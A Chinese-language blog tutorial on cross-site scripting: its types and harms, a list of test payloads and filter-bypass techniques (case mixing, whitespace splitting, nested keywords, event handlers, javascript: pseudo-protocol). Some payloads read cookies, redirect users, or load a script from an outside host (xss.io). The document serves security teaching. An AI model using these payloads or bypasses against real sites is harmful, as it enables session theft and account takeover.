WEB漏洞挖掘-XSS基础与利用(概念,类型,场景,危害)

最新推荐文章于 2025-03-24 00:46:45 发布
最新推荐文章于 2025-03-24 00:46:45 发布
阅读量784 收藏 1
点赞数 1
文章标签: xss 安全 web安全
原文链接:https://blog.youkuaiyun.com/weixin_55821558/article/details/123534829
版权

目录

        跨站脚本攻击漏洞概述

        跨站脚本攻击漏洞类型及场景

        XSS常用的绕过方式

        跨站脚本攻击漏洞实操

跨站脚本攻击漏洞概述

什么是跨站脚本攻击?
        跨站脚本( Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)。
        为了避免 与HTML语言中的CSS相混淆,通常称它为"XSS”

危害?
•获取用户信息;(如浏览器信息、ip地址、cookie信息等)
• 钧鱼;(利用xss漏洞构造出一个登录框,骗取用户账户密码,提示登录过期,模拟一个
网站的登录框,将用户名、密码发送到攻击者服务器)
•注入木马或广告链接;(有些在主站注入非法网站的链接,对公司的声誉有一定的影响)
•后台增删改网站数据等操作;(配合CSRF漏洞 ,骗取用户点击,利用js模找浏览器发包)
•xss蠕虫(微博蠕虫:只要看过某人的微博就是自动关注某人;贴吧蠕虫:看过某个帖子
就是自动回复这个贴子)

漏洞类型以及应用场景


反射型xs——非持久型,一次性攻击——可用于钓鱼、引流、配合其他漏洞如CSRF等


•存储型xss——持久型,伴随数据存在——攻击范围大,流量传播大,可配合其他漏洞。


•DOM型xss——基于文档对象模型——配合,长度大小不受限制。

htlm里js里
常用标签<iframe>alert
<textarea>window.location
<img>location.href
<script>

on类型:onsubmint、onerror、

onmouseout、onclick等

关于“见框就插”我的收藏

<script>alert(123)</script>

Javascript:alert(123)

<img src=x  οnerrοr="alert(123)"/>

οnmοuseοver='javascript:alert(123)'

<a href=javascript:alert(123)>hahahahahaha</a>

<div Onclick="alert('xss')">

< img src=1 alert(1)> (显示1)

<script>alert("xss")</script> (显示xss)

<script>alert(document.cookie)</script> (显示cookie)

<script>window.location="(你的黑页地址)";</script>

< img src="javascript:alert('XSS')">

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

"+alert('XSS')+"

<script src="http://xss.io/a.js"></script>

<div οnclick="alert('xss')">

<div οnmοuseenter="alert('xss')">

"οnclick="alert(document.cookie)
 

XSS常用的绕过方式

1.大小写绕过

代码如下(示例):

<script>alert(“xss”);</script>
<ScRipt>ALeRt(“XSS”);</sCRipT>

2.空格/回车(换行符)/Tab

当过滤掉了Javascript等敏感字符串时就对字符串进行添加空格,换行或tab,此处利用js自身的性质:js通常用分号结尾,当解析到完整语句并且行尾存在换行符的情况下就可以忽略掉分号,若解析确定不是完整语句,则会继续处理,直到语句结束或出现分号。

例如下列语句,我们利用空格将语句分隔成了两部分,解析引擎解析确定到的不是完整的语句,JavaScript则会继续进行处理直到这个语句结束,利用换行符和tab同理

代码如下(示例):

<img src="java  script:alert(‘xss‘);" width=100>


或者

<img src="javascript:  alert(‘xss‘);" width=100>

3.堆叠绕过

类似于 输出为 为变量$str

$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

可以采用oonn避开过滤 机制是吧中间的on过滤了

4.事件绕过

就是加入一些事件  此方法可绕过大部分SRC域名过滤器,它允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick

事件描述
onclick在用户使用鼠标左键点击对象时触发
ondblclick用户双击对象时触发
onmousedown用户用任何鼠标按键单击对象时触发
onmouseenter/onmouseover用户将鼠标指针移动到对象内时触发
onmouseleave/onmouseout用户将鼠标移出对象边界时触发
onmousemove用户将鼠标划过对象时触发
onmouseup用户在鼠标位于对象之上时释放鼠标按钮触发
onmousewheel鼠标滚轮按钮旋转时触发
onpaste用户粘贴数据以便从剪切板向文档传输数据在目标对象上时触发
onpropertychange在对象上发生对象属性更改时触发
onkeydown用户按下键盘按键时触发
onerror装载文档或图像的过程中发生错误时触发
onload加载完毕自动触发

5.伪协议绕过

利用 在a标签里插入 javascript:   伪协议

6.前端抓包绕过

过滤严格的函数可能也会将标签进行严格控制,但是如果用其他形式表示标签,脚本仍能解析却可以绕过过滤


参考链接:https://blog.youkuaiyun.com/weixin_55821558/article/details/123534829

【网络安全 | 漏洞挖掘XSS之绕过HttpOnly实现帐户接管
等风来
05-29 2569
fetch 方法是JavaScript中用于发起网络请求的现代 API,实现从网络中获取资源(如文本、JSON、Blob 等)。url 是要发送请求的 URL,而 options 则是一个包含各种配置选项的对象,例如请求方法、请求头、身份验证信息等。fetch 方法返回一个 Promise,该 Promise 在收到响应后会解析为 Response 对象。通过对 Response 对象执行方法和访问属性,可以获取响应的状态、头信息和内容。
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1043
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
XSS总结
weixin_51356351的博客
11-19 1651
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
[80Sec]深掘XSS漏洞场景XSS Rootkit
weixin_30518397的博客
10-17 141
顶80SEC的牛。 转载开始。 深掘XSS漏洞场景XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-10-15 0×00 前言 众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久...
一篇文章精通 XSS并学会实战挖漏洞(8000 字深度版)
最新发布
lshen12345678的博客
03-24 364
攻击侧基于 AI 的 Payload 生成工具(如 GPT-XSS)针对 WebRTC 等新 API 的 XSS 漏洞防御侧基于机器学习的输入检测模型浏览器内置的 Trust Tokens 机制XSS 的本质是数据代码的身份混淆,掌握其核心在于理解 “在浏览器中,一切皆可执行”。通过持续实战和跟踪前沿技术,白帽黑客可以在攻防对抗中始终占据主动。附录:常用 Payload 速查表场景Payload基础弹窗窃取 Cookie突破过滤(字母)DOM 型 XSS(哈希)自动提交表单。
利用xss漏洞能做什么?
alex_2008的专栏
04-08 3596
利用xss漏洞能做什么? 2008-03-31 18:29:48 或许大家经常看一些高手测试XSS漏洞都是alert一个窗口来。便以为XSS即是如此,当自己alert出窗口来,便说自己发现了漏洞。其实远没这么简单。你发现的只是程序员的一个小bug而已,远谈不上XSS。它们的关系如同系统漏洞漏洞利用的关系,不可同日而语。你的系统是否出现过“****内存不能为read”?你是否知道它是溢出漏
xss漏洞挖掘
qq_44790964的博客
11-11 352
COOKIE获取 个人资料 昵称 签名 说明 邮箱 微信 qq 支付宝 银行啊 看标签是怎么闭合的 都要去试一下xss 还要post提交到服务器数据 留言 闭合标签 不要留弹框 没有什么意义 可能还会被管理员发现 xss平台 什么是http-only 只读的一种传输方式 cookie 我们可以进行钓鱼 xss漏洞可以执行js代码 让它执行代码的时候 远程加载我们伪造和它后台一模一样的页面 然后它...
XSS漏洞利用
LizePing_的博客
07-29 5482
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
web漏洞挖掘指南 -XSS跨站脚本攻击
weixin_40418457的博客
10-12 1351
一、漏洞原理 跨站脚本英文全称(Cross Site Scripting跨站脚本),为了不和css层叠样式表(英文全称:Cascading Style Sheets)混淆,因此将跨站脚本缩写为XSS。产生XSS漏洞根本原因其实是web应用未对用户的输入进行严格的过滤和转义,导致攻击者可从正常的输入功能注入脚本代码,我常将xss攻击理解为一种javascript注入,当带有xss恶意代码的页面被其他用户访问到时,js便会被执行,js脚本可以执行很多操作,比如:窃取用户cookie,读取用户键盘记录,截屏,恶
XSS漏洞挖掘利用教程
07-31
XSS漏洞挖掘利用教程】 XSS,全称为跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞,允许攻击者在用户的浏览器上注入恶意脚本。本教程将深入探讨XSS漏洞挖掘利用方法,通过实例解析其...
Flash XSS漏洞挖掘1
08-03
【Flash XSS漏洞挖掘1】 Flash XSS(跨站脚本)漏洞是网络安全领域中一个重要的问题,尤其是在企业级的Bug Bounty活动中。尽管这个概念并不新鲜,早在2002年就已经有相关的技术出现,但近期在Apple、Amazon、Adobe...
xss利用挖掘
08-17
学习xss利用挖掘的好资料,有助于新手安全学习入门使用
xss挖掘初上手
xiaoi123的博客
12-07 352
  本文主要总结了xss可能出现的场景。 偏向于案例,最后分享一哈简单的绕过和比较好用的标签。   1.搜索框 首先看能否闭合前面的标签。 如输入111”&gt;&lt;svg/onload=alert(1)&gt; 查看源码是否将前面标签闭合,可闭合的话可触发xss 如过无法闭合时,用事件来触发xss. 输入1111”&gt;&lt;svg/onload=alert(1)&gt;,F1...
xss漏洞的简单分析利用
jiav_net的专栏
10-14 334
web蓬勃发展的今天,xss毫无疑问已经变成最“流行”的漏洞,我曾经在安全公司的渗透测试报告里看到列为数十的高危xss漏洞,也看到越来越多的安全研究人员将目标投向xss攻击,发现100个甚至1000个之上的xssxss变得如此流行的原因我猜测有几点,首先输入输出是一个应用程序最基本的交互,一个提供服务的应用程序可以不操作数据库,可以不系统交互,但是肯定会将程序的处理结果返回给浏览器,加上程序...
XSS利用
YIN_XIAOMAO的博客
05-29 411
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
一次xss的黑盒挖掘利用过程
weixin_30730151的博客
01-23 240
挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教。文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测...
什么是XSS攻击&XSS攻击应用场景
Leon_Jinhai_Sun的博客
10-23 1291
XSS攻击 什么是XSS攻击手段 XSS攻击使用Javascript脚本注入进行攻击 例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端。 <script>alert('sss')</script> <script>window.location.href='http://www.learn....
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4869
(1)了解beEF工具的使用; (2)加深理解XSS漏洞利用危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
XSS利用方式
u011215939的博客
01-16 9074
前言 学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但是从来没有实践过,今天浏览FreeBuf时,发现一篇XSS利用文章,哈哈哈……于是乎,实践一下…… 准备 为了获取目标IP及ookie,实践开始之前,需要准备一个东西:VPS
回车绕过:WEB漏洞挖掘防火墙破解策略
本文档深入探讨了"其实就是回车绕过防火墙规则的检测"这一WEB常见漏洞挖掘技巧,主要关注于SQL注入和跨站脚本(XSS/CSRF)等安全问题。作者吴建亮,以广东动易网络的专家身份,结合实际案例,揭示了在WEB开发中常见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值